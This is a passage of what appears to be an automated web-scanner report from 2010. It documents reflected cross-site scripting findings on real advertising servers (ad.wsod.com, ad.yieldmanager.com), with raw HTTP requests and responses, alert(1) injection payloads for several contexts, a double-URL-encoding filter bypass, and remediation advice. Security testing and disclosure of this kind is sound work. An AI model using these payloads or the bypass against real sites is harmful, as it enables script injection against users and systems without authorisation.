HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354";alert(1)//424e1783b9d/1290209581**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b84c0"><script>alert(1)</script>a09472ff739 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:32:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2362
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*b84c0"><script>alert(1)</script>a09472ff739http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f52c"-alert(1)-"37bd5be3146 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:32:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2332
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*7f52c"-alert(1)-"37bd5be3146"> ...[SNIP]...
2.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dd2"-alert(1)-"7f1a0a0fe72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2338
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a4dd2"-alert(1)-"7f1a0a0fe72=1"> ...[SNIP]...
2.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc74e"><script>alert(1)</script>405f7dc3d84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2368
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&dc74e"><script>alert(1)</script>405f7dc3d84=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ce6'-alert(1)-'7a6a2b33397 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/ Set-Cookie: i_1=46:475:844:44:0:32947:1290209601:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 730
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*86ce6'-alert(1)-'7a6a2b33397http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.844.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0 was submitted in the REST URL parameter 2. This input was echoed as 8332a"><script>alert(1)</script>8cdd98fbef0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313578332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0/475.0.iframe.200x33/1290207272** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313578332a"><script>alert(1)</script>8cdd98fbef0/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26807%2522%253balert%25281%2529%252f%252fce3e2d56175 was submitted in the REST URL parameter 2. This input was echoed as 26807";alert(1)//ce3e2d56175 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135726807%2522%253balert%25281%2529%252f%252fce3e2d56175/475.0.iframe.200x33/1290207272** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135726807";alert(1)//ce3e2d56175/475.0.iframe.200x33/1290209586**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c was submitted in the REST URL parameter 3. This input was echoed as 3fd2f"><script>alert(1)</script>83dff2bd15c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c/1290207272** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f"><script>alert(1)</script>83dff2bd15c/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6313f%2522%253balert%25281%2529%252f%252f64bea35dc56 was submitted in the REST URL parameter 3. This input was echoed as 6313f";alert(1)//64bea35dc56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f%2522%253balert%25281%2529%252f%252f64bea35dc56/1290207272** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f";alert(1)//64bea35dc56/1290209589**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
2.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a88b6'-alert(1)-'00389b2718a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:35:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/ Set-Cookie: i_1=46:475:692:44:0:32947:1290209716:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 734
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a88b6'-alert(1)-'00389b2718a=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.692.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out mo ...[SNIP]...
2.61. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9071"-alert(1)-"47372ef7d14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.